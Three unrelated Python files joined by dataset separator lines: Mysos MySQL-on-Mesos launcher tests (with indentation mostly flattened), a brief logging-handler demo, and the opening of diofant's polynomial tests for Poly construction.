del self._offer.resources[:]
resources = create_resources(
cpus=DEFAULT_TASK_CPUS * 3,
mem=DEFAULT_TASK_MEM * 3,
            disk=DEFAULT_TASK_DISK * 3 - Amount(1, Data.MB),  # 1 MB less than the required disk space.
ports=set([10000, 10001, 10002]))
self._offer.resources.extend(resources)
        # There is not enough disk space to launch the entire cluster.
for i in range(self._cluster.num_nodes - 1):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes - 1
# The final task cannot get launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes - 1
# The two nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING # Valid state.
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes - 1):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# One slave.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 1
def test_two_launchers(self):
"""Two launchers share resources and launch their clusters successfully."""
launchers = [
MySQLClusterLauncher(
self._driver,
MySQLCluster(
"cluster0",
"user0",
self._password_box.encrypt("pass0"),
1,
DEFAULT_TASK_CPUS,
DEFAULT_TASK_MEM,
DEFAULT_TASK_DISK),
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key),
MySQLClusterLauncher(
self._driver,
MySQLCluster(
"cluster1",
"user1",
self._password_box.encrypt("pass1"),
2,
DEFAULT_TASK_CPUS,
DEFAULT_TASK_MEM,
DEFAULT_TASK_DISK),
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key)]
self._launchers.extend(launchers)
resources = create_resources(
cpus=DEFAULT_TASK_CPUS * 3,
mem=DEFAULT_TASK_MEM * 3,
disk=DEFAULT_TASK_DISK * 3,
ports=set([10000, 10001, 10002]))
self._offer.resources.extend(resources)
# Three nodes in total across two clusters.
# Simulate the scheduler.
for i in range(3):
for launcher in launchers:
task_id, remaining = launcher.launch(self._offer)
if task_id:
# Update the offer so other launchers will use its remaining resources.
del self._offer.resources[:]
self._offer.resources.extend(remaining)
break
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == 3
def test_invalid_status_update(self):
"""Launcher raises an exception when an invalid status is received."""
self._cluster.num_nodes = 1
launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key)
self._launchers.append(launcher)
resources = create_resources(
cpus=DEFAULT_TASK_CPUS,
mem=DEFAULT_TASK_MEM,
disk=DEFAULT_TASK_DISK,
ports=set([10000]))
self._offer.resources.extend(resources)
task_id, _ = launcher.launch(self._offer)
assert task_id == "mysos-cluster0-0"
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
status = mesos_pb2.TaskStatus()
status.task_id.value = task_id
status.state = mesos_pb2.TASK_RUNNING # Valid state.
launcher.status_update(status)
status.state = mesos_pb2.TASK_FINISHED # An invalid state.
with pytest.raises(MySQLClusterLauncher.Error):
launcher.status_update(status)
def test_terminal_status_update(self):
"""Launcher reacts to terminated task by launching a new one."""
self._cluster.num_nodes = 1
launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(1, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key)
self._launchers.append(launcher)
resources = create_resources(
cpus=DEFAULT_TASK_CPUS,
mem=DEFAULT_TASK_MEM,
disk=DEFAULT_TASK_DISK,
ports=set([10000]))
self._offer.resources.extend(resources)
task_id, _ = launcher.launch(self._offer)
assert task_id == "mysos-cluster0-0"
launched = self._driver.method_calls["launchTasks"]
assert len(launched) == self._cluster.num_nodes
status = mesos_pb2.TaskStatus()
status.task_id.value = task_id
status.state = mesos_pb2.TASK_RUNNING
launcher.status_update(status)
assert len(launcher._cluster.running_tasks) == 1
status.state = mesos_pb2.TASK_LOST
launcher.status_update(status)
assert len(launcher._cluster.running_tasks) == 0
task_id, _ = launcher.launch(self._offer)
assert task_id == "mysos-cluster0-1"
launched = self._driver.method_calls["launchTasks"]
# One task is relaunched to make up for the lost one.
assert len(launched) == self._cluster.num_nodes + 1
def test_master_failover(self):
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
        # No log position queries are sent for the first epoch.
assert "sendFrameworkMessage" not in self._driver.method_calls
# Wait for the election to complete.
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Now fail the master task.
status.task_id.value = "mysos-cluster0-0"
status.state = mesos_pb2.TASK_FAILED
self._launcher.status_update(status)
assert len(self._launcher._cluster.running_tasks) == 2
        # Log position queries are sent.
self._launcher._elector._elect()
assert len(self._driver.method_calls["sendFrameworkMessage"]) >= 2
for i in range(1, self._cluster.num_nodes):
self._launcher.framework_message(
"mysos-cluster0-%s" % i,
self._offer.slave_id.value,
json.dumps(dict(epoch=1, position=str(i))))
# Wait for the election to complete.
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The slave with the highest position is elected.
assert "/mysos/test/cluster0/master/member_0000000002" in self._storage.paths
assert len(self._launcher._cluster.running_tasks) == 2
# When a new offer comes in, a new task is launched.
del self._offer.resources[:]
resources = create_resources(
cpus=DEFAULT_TASK_CPUS,
mem=DEFAULT_TASK_MEM,
disk=DEFAULT_TASK_DISK,
ports=set([10000]))
self._offer.resources.extend(resources)
task_id, _ = self._launcher.launch(self._offer)
assert task_id == "mysos-cluster0-3"
launched = self._driver.method_calls["launchTasks"]
# One task is relaunched to make up for the failed one.
assert len(launched) == self._cluster.num_nodes + 1
def test_launcher_recovery_after_election_completed(self):
# 1. Launch a cluster on the running launcher.
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# No new tasks are launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Two slaves.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 2
# 2. Recover the launcher.
self._cluster = self._state_provider.load_cluster_state(self._cluster.name)
self._launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key,
query_interval=Amount(150, Time.MILLISECONDS))
# Now fail the master task.
status.task_id.value = "mysos-cluster0-0"
status.state = mesos_pb2.TASK_FAILED
self._launcher.status_update(status)
for i in range(1, self._cluster.num_nodes):
self._launcher.framework_message(
"mysos-cluster0-%s" % i,
self._offer.slave_id.value,
json.dumps(dict(epoch=1, position=str(i))))
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The second slave has the larger position and is elected.
assert "/mysos/test/cluster0/master/member_0000000002" in self._storage.paths
def test_launcher_recovery_before_election_completed(self):
# 1. Launch a cluster on the running launcher.
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# No new tasks are launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Two slaves.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 2
# Now fail the master task which leads to re-election.
status.task_id.value = "mysos-cluster0-0"
status.state = mesos_pb2.TASK_FAILED
self._launcher.status_update(status)
# 2. Recover the launcher.
self._cluster = self._state_provider.load_cluster_state(self._cluster.name)
self._launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key,
query_interval=Amount(150, Time.MILLISECONDS))
for i in range(1, self._cluster.num_nodes):
self._launcher.framework_message(
"mysos-cluster0-%s" % i,
self._offer.slave_id.value,
json.dumps(dict(epoch=2, position=str(i))))
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The second slave has the larger position and is elected.
assert "/mysos/test/cluster0/master/member_0000000002" in self._storage.paths
def test_launcher_kill(self):
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# No new tasks are launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING # Valid state.
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Two slaves.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 2
# Kill the cluster.
with pytest.raises(MySQLClusterLauncher.PermissionError):
self._launcher.kill("wrong_password")
# Correct password.
self._launcher.kill(self._password_box.decrypt(self._cluster.encrypted_password))
# All 3 nodes are successfully killed.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_KILLED
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
assert "/mysos/test/cluster0" not in self._storage.paths # ServerSets removed.
assert not self._state_provider.load_cluster_state("cluster0") # State removed.
def test_launcher_recovery_corrupted_password(self):
# 1. Launch a single instance for a cluster on the running launcher.
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-0"
# The task has successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING
status.slave_id.value = self._offer.slave_id.value
status.task_id.value = "mysos-cluster0-0"
self._launcher.status_update(status)
# 2. Recover the launcher.
self._cluster = self._state_provider.load_cluster_state(self._cluster.name)
self._cluster.encrypted_password = "corrupted_password"
# The corrupted password causes the launcher constructor to fail.
with pytest.raises(ValueError):
self._launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key,
query_interval=Amount(150, Time.MILLISECONDS))
|
py | b40b24719eae52ccb90172db7e16fb621b460f39 | import logging
logger = logging.getLogger('logger_1')
logger.warning('warning')
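# No handler is attached to logger_1 or to the root logger yet, so the record
# above is emitted by logging's last-resort handler as the bare message
# "warning" on stderr.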
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s:%(message)s')
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.warning('warning again')
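# This record is printed once, in the timestamped format, by the handler just
# attached to logger_1; root still has no handler, so propagation adds nothing.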
root = logging.getLogger()
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s:%(message)s')
stream_handler.setFormatter(formatter)
root.addHandler(stream_handler)
root.warning('warning')
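# root handles its own record above; from here on, a message on logger_1 would
# print twice: once via its own handler and once via propagation to root.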
|
py | b40b251565dc56624c3ab37ca8445ba1dd8ea394 | """Tests for user-friendly public interface to polynomial functions."""
import functools
import math
import pytest
from diofant import (CC, EX, FF, LC, LM, LT, QQ, RR, ZZ, CoercionFailed,
ComputationFailed, Derivative, DomainError, E, Eq,
ExactQuotientFailed, Expr, FlagError, Float,
GeneratorsError, GeneratorsNeeded, GroebnerBasis, I,
Integer, Integral, MatrixSymbol, Mul,
MultivariatePolynomialError, O, OptionError, Piecewise,
PolificationFailed, Poly, PolynomialError, PurePoly,
Rational, RealField, RootOf, Sum, Symbol, Tuple,
UnificationFailed, cancel, cofactors, compose, content,
cos, count_roots, decompose, degree, diff, discriminant,
div, exp, expand, exquo, factor, factor_list, false, gcd,
gcdex, grevlex, grlex, groebner, half_gcdex, im, invert,
lcm, lex, log, monic, nroots, oo, parallel_poly_from_expr,
pi, primitive, quo, re, real_roots, reduced, rem,
resultant, sin, sqf, sqf_list, sqf_norm, sqf_part, sqrt,
subresultants, symbols, sympify, tan, tanh, terms_gcd,
true, trunc)
from diofant.abc import a, b, c, d, p, q, t, w, x, y, z
from diofant.core.mul import _keep_coeff
from diofant.polys.polytools import to_rational_coeffs
__all__ = ()
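# An empty __all__ makes "from ... import *" export nothing from this module.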
def _epsilon_eq(a, b):
for x, y in zip(a, b):
if abs(x - y) > 1e-10:
return False
return True
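# Note: zip() stops at the shorter argument, so _epsilon_eq assumes both
# coefficient sequences have the same length, as they do in these tests.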
def test_Poly_from_dict():
K = FF(3)
assert Poly.from_dict({0: 1, 1: 2}, gens=x,
domain=K).rep.all_coeffs() == [K(1), K(2)]
assert Poly.from_dict({0: 1, 1: 5}, gens=x,
domain=K).rep.all_coeffs() == [K(1), K(2)]
assert Poly.from_dict({(0,): 1, (1,): 2}, gens=x,
domain=K).rep.all_coeffs() == [K(1), K(2)]
assert Poly.from_dict({(0,): 1, (1,): 5}, gens=x,
domain=K).rep.all_coeffs() == [K(1), K(2)]
assert dict(Poly.from_dict({(0, 0): 1, (1, 1): 2}, gens=(x, y),
domain=K).rep) == {(0, 0): K(1), (1, 1): K(2)}
assert Poly.from_dict({0: 1, 1: 2}, gens=x).rep.all_coeffs() == [ZZ(1), ZZ(2)]
assert Poly.from_dict({0: 1, 1: 2}, gens=x,
field=True).rep.all_coeffs() == [QQ(1), QQ(2)]
assert Poly.from_dict({0: 1, 1: 2}, gens=x,
domain=ZZ).rep.all_coeffs() == [ZZ(1), ZZ(2)]
assert Poly.from_dict({0: 1, 1: 2}, gens=x,
domain=QQ).rep.all_coeffs() == [QQ(1), QQ(2)]
assert Poly.from_dict({(0,): 1, (1,): 2},
gens=x).rep.all_coeffs() == [ZZ(1), ZZ(2)]
assert Poly.from_dict({(0,): 1, (1,): 2}, gens=x,
field=True).rep.all_coeffs() == [QQ(1), QQ(2)]
assert Poly.from_dict({(0,): 1, (1,): 2}, gens=x,
domain=ZZ).rep.all_coeffs() == [ZZ(1), ZZ(2)]
assert Poly.from_dict({(0,): 1, (1,): 2}, gens=x,
domain=QQ).rep.all_coeffs() == [QQ(1), QQ(2)]
assert Poly.from_dict({(1,): sin(y)}, gens=x, composite=False) == \
(sin(y)*x).as_poly(x, domain=EX)
assert Poly.from_dict({(1,): y}, gens=x, composite=False) == \
(y*x).as_poly(x, domain=EX)
assert Poly.from_dict({(1, 1): 1}, gens=(x, y), composite=False) == \
(x*y).as_poly(x, y, domain=ZZ)
assert Poly.from_dict({(1, 0): y}, gens=(x, z), composite=False) == \
(y*x).as_poly(x, z, domain=EX)
pytest.raises(GeneratorsError,
lambda: Poly.from_dict({(1,): x, (0,): 1}, gens=(x,)))
def test_Poly_from_list():
K = FF(3)
assert Poly.from_list([2, 1], gens=x, domain=K).rep.all_coeffs() == [K(2), K(1)]
assert Poly.from_list([5, 1], gens=x, domain=K).rep.all_coeffs() == [K(2), K(1)]
assert Poly.from_list([2, 1], gens=x).rep.all_coeffs() == [ZZ(2), ZZ(1)]
assert Poly.from_list([2, 1], gens=x, field=True).rep.all_coeffs() == [QQ(2), QQ(1)]
assert Poly.from_list([2, 1], gens=x, domain=ZZ).rep.all_coeffs() == [ZZ(2), ZZ(1)]
assert Poly.from_list([2, 1], gens=x, domain=QQ).rep.all_coeffs() == [QQ(2), QQ(1)]
assert Poly.from_list([0, 1.0], gens=x).rep.all_coeffs() == [RR(0), RR(1.0)]
assert Poly.from_list([1.0, 0], gens=x).rep.all_coeffs() == [RR(1.0)]
pytest.raises(MultivariatePolynomialError, lambda: Poly.from_list([[]], gens=(x, y)))
pytest.raises(GeneratorsError, lambda: Poly.from_list([x, 1], gens=(x,)))
def test_Poly_from_poly():
f = (x + 7).as_poly(x, domain=ZZ)
g = (x + 2).as_poly(x, modulus=3)
h = (x + y).as_poly(x, y, domain=ZZ)
K = FF(3)
assert Poly.from_poly(f) == f
assert Poly.from_poly(f, domain=K).rep.all_coeffs() == [K(1), K(1)]
assert Poly.from_poly(f, domain=ZZ).rep.all_coeffs() == [ZZ(7), ZZ(1)]
assert Poly.from_poly(f, domain=QQ).rep.all_coeffs() == [QQ(7), QQ(1)]
assert Poly.from_poly(f, gens=x) == f
assert Poly.from_poly(f, gens=x, domain=K).rep.all_coeffs() == [K(1), K(1)]
assert Poly.from_poly(f, gens=x, domain=ZZ).rep.all_coeffs() == [ZZ(7), ZZ(1)]
assert Poly.from_poly(f, gens=x, domain=QQ).rep.all_coeffs() == [QQ(7), QQ(1)]
assert Poly.from_poly(f, gens=y) == (x + 7).as_poly(y, domain=ZZ.inject(x))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=K))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=ZZ))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=QQ))
assert Poly.from_poly(f, gens=(x, y)) == (x + 7).as_poly(x, y, domain=ZZ)
assert Poly.from_poly(
f, gens=(x, y), domain=ZZ) == (x + 7).as_poly(x, y, domain=ZZ)
assert Poly.from_poly(
f, gens=(x, y), domain=QQ) == (x + 7).as_poly(x, y, domain=QQ)
assert Poly.from_poly(
f, gens=(x, y), modulus=3) == (x + 7).as_poly(x, y, domain=FF(3))
K = FF(2)
assert Poly.from_poly(g) == g
assert Poly.from_poly(g, domain=ZZ).rep.all_coeffs() == [ZZ(2), ZZ(1)]
pytest.raises(CoercionFailed, lambda: Poly.from_poly(g, domain=QQ))
assert Poly.from_poly(g, domain=K).rep.all_coeffs() == [K(0), K(1)]
assert Poly.from_poly(g, gens=x) == g
assert Poly.from_poly(g, gens=x, domain=ZZ).rep.all_coeffs() == [ZZ(2), ZZ(1)]
pytest.raises(CoercionFailed, lambda: Poly.from_poly(g, gens=x, domain=QQ))
assert Poly.from_poly(g, gens=x, domain=K).rep.all_coeffs() == [K(0), K(1)]
K = FF(3)
assert Poly.from_poly(h) == h
assert dict(Poly.from_poly(h, domain=ZZ).rep) == {(1, 0): ZZ(1), (0, 1): ZZ(1)}
assert dict(Poly.from_poly(h, domain=QQ).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
assert dict(Poly.from_poly(h, domain=K).rep) == {(1, 0): K(1), (0, 1): K(1)}
assert Poly.from_poly(h, gens=x) == (x + y).as_poly(x, domain=ZZ.inject(y))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=ZZ))
assert Poly.from_poly(
h, gens=x, domain=ZZ.inject(y)) == (x + y).as_poly(x, domain=ZZ.inject(y))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=QQ))
assert Poly.from_poly(
h, gens=x, domain=QQ.inject(y)) == (x + y).as_poly(x, domain=QQ.inject(y))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, modulus=3))
assert Poly.from_poly(h, gens=y) == (x + y).as_poly(y, domain=ZZ.inject(x))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=ZZ))
assert Poly.from_poly(
h, gens=y, domain=ZZ.inject(x)) == (x + y).as_poly(y, domain=ZZ.inject(x))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=QQ))
assert Poly.from_poly(
h, gens=y, domain=QQ.inject(x)) == (x + y).as_poly(y, domain=QQ.inject(x))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, modulus=3))
assert Poly.from_poly(h, gens=(x, y)) == h
assert dict(Poly.from_poly(h, gens=(x, y),
domain=ZZ).rep) == {(1, 0): ZZ(1), (0, 1): ZZ(1)}
assert dict(Poly.from_poly(h, gens=(x, y),
domain=QQ).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
assert dict(Poly.from_poly(h, gens=(x, y),
domain=K).rep) == {(1, 0): K(1), (0, 1): K(1)}
assert dict(Poly.from_poly(h, gens=(y, x)).rep) == {(1, 0): ZZ(1), (0, 1): ZZ(1)}
assert dict(Poly.from_poly(h, gens=(y, x),
domain=ZZ).rep) == {(1, 0): ZZ(1), (0, 1): ZZ(1)}
assert dict(Poly.from_poly(h, gens=(y, x),
domain=QQ).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
assert dict(Poly.from_poly(h, gens=(y, x),
domain=K).rep) == {(1, 0): K(1), (0, 1): K(1)}
assert dict(Poly.from_poly(h, gens=(x, y),
field=True).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
assert dict(Poly.from_poly(h, gens=(x, y),
field=True).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
def test_Poly_from_expr():
pytest.raises(GeneratorsNeeded, lambda: Poly.from_expr(Integer(0)))
pytest.raises(GeneratorsNeeded, lambda: Poly.from_expr(Integer(7)))
F3 = FF(3)
assert Poly.from_expr(x + 5, domain=F3).rep.all_coeffs() == [F3(2), F3(1)]
assert Poly.from_expr(y + 5, domain=F3).rep.all_coeffs() == [F3(2), F3(1)]
assert Poly.from_expr(x + 5, x, domain=F3).rep.all_coeffs() == [F3(2), F3(1)]
assert Poly.from_expr(y + 5, y, domain=F3).rep.all_coeffs() == [F3(2), F3(1)]
assert dict(Poly.from_expr(x + y, domain=F3).rep) == {(1, 0): F3(1), (0, 1): F3(1)}
assert dict(Poly.from_expr(x + y, x, y, domain=F3).rep) == {(1, 0): F3(1), (0, 1): F3(1)}
assert Poly.from_expr(x + 5).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(y + 5).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(x + 5, x).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(y + 5, y).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(x + 5, domain=ZZ).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(y + 5, domain=ZZ).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(x + 5, x, domain=ZZ).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(y + 5, y, domain=ZZ).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert dict(Poly.from_expr(x + 5, x, y, domain=ZZ).rep) == {(1, 0): ZZ(1), (0, 0): ZZ(5)}
assert dict(Poly.from_expr(y + 5, x, y, domain=ZZ).rep) == {(0, 1): ZZ(1), (0, 0): ZZ(5)}
def test_Poly__new__():
pytest.raises(GeneratorsError, lambda: Poly(x + 1, x, x))
pytest.raises(GeneratorsError, lambda: Poly(x + y, x, y, domain=ZZ.inject(x)))
pytest.raises(GeneratorsError, lambda: Poly(x + y, x, y, domain=ZZ.inject(y)))
pytest.raises(OptionError, lambda: Poly(x + 2, x, modulus=3, domain=QQ))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, gaussian=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, modulus=3, gaussian=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, extension=[sqrt(3)]))
pytest.raises(OptionError, lambda: Poly(x + 2, x, modulus=3, extension=[sqrt(3)]))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, extension=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, modulus=3, extension=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, greedy=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=QQ, field=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, greedy=False))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=QQ, field=False))
f = (x + 1).as_poly(x, modulus=3, order='grlex')
assert f.get_modulus() == 3
assert f.rep.ring.order == grlex
f = (x + 1).as_poly(x, order='grlex')
assert f.rep.ring.order == grlex
pytest.raises(GeneratorsNeeded, lambda: Poly({1: 2, 0: 1}))
pytest.raises(GeneratorsNeeded, lambda: Poly([2, 1]))
pytest.raises(GeneratorsNeeded, lambda: Poly((2, 1)))
pytest.raises(GeneratorsNeeded, lambda: Poly(1))
f = a*x**2 + b*x + c
assert Poly({2: a, 1: b, 0: c}, x) == f
assert Poly(iter([c, b, a]), x) == f
assert Poly([c, b, a], x) == f
assert Poly((c, b, a), x) == f
f = Poly({}, x, y, z)
assert f.gens == (x, y, z) and f.as_expr() == 0
assert ((a*x + b*y).as_poly(x, y)).as_poly(x) == (a*x + b*y).as_poly(x)
assert (3*x**2 + 2*x + 1).as_poly(domain=ZZ).all_coeffs() == [1, 2, 3]
assert (3*x**2 + 2*x + 1).as_poly(domain=QQ).all_coeffs() == [1, 2, 3]
assert (3*x**2 + 2*x + 1).as_poly(domain=RR).all_coeffs() == [1.0, 2.0, 3.0]
pytest.raises(CoercionFailed, lambda: Poly(3*x**2/5 + 2*x/5 + 1, x, domain=ZZ))
assert (3*x**2/5 + 2*x/5 + 1).as_poly(domain=QQ).all_coeffs() == [1, Rational(2, 5), Rational(3, 5)]
assert _epsilon_eq(
(3*x**2/5 + 2*x/5 + 1).as_poly(domain=RR).all_coeffs(), [1.0, 0.4, 0.6])
assert (3.0*x**2 + 2.0*x + 1).as_poly(domain=ZZ).all_coeffs() == [1, 2, 3]
assert (3.0*x**2 + 2.0*x + 1).as_poly(domain=QQ).all_coeffs() == [1, 2, 3]
assert (3.0*x**2 + 2.0*x + 1).as_poly(domain=RR).all_coeffs() == [1.0, 2.0, 3.0]
pytest.raises(CoercionFailed, lambda: Poly(3.1*x**2 + 2.1*x + 1, x, domain=ZZ))
assert (3.1*x**2 + 2.1*x + 1).as_poly(domain=QQ).all_coeffs() == [1, Rational(21, 10), Rational(31, 10)]
assert (3.1*x**2 + 2.1*x + 1).as_poly(domain=RR).all_coeffs() == [1.0, 2.1, 3.1]
assert Poly({(2, 1): 1, (1, 2): 2, (1, 1): 3}, x, y) == \
(x**2*y + 2*x*y**2 + 3*x*y).as_poly(x, y)
assert (x**2 + 1).as_poly(extension=I).domain == QQ.algebraic_field(I)
f = 3*x**5 - x**4 + x**3 - x**2 + 65538
assert f.as_poly(x, modulus=65537) == \
(3*x**5 + 65536*x**4 + x**3 + 65536*x**2 + 1).as_poly(x, modulus=65537)
assert isinstance((x**2 + x + 1.0).as_poly().domain, RealField)
def test_Poly_new():
pytest.raises(PolynomialError, lambda: Poly.new([1], x))
pytest.raises(PolynomialError, lambda: Poly.new((x + 1).as_poly(x, y).rep, x))
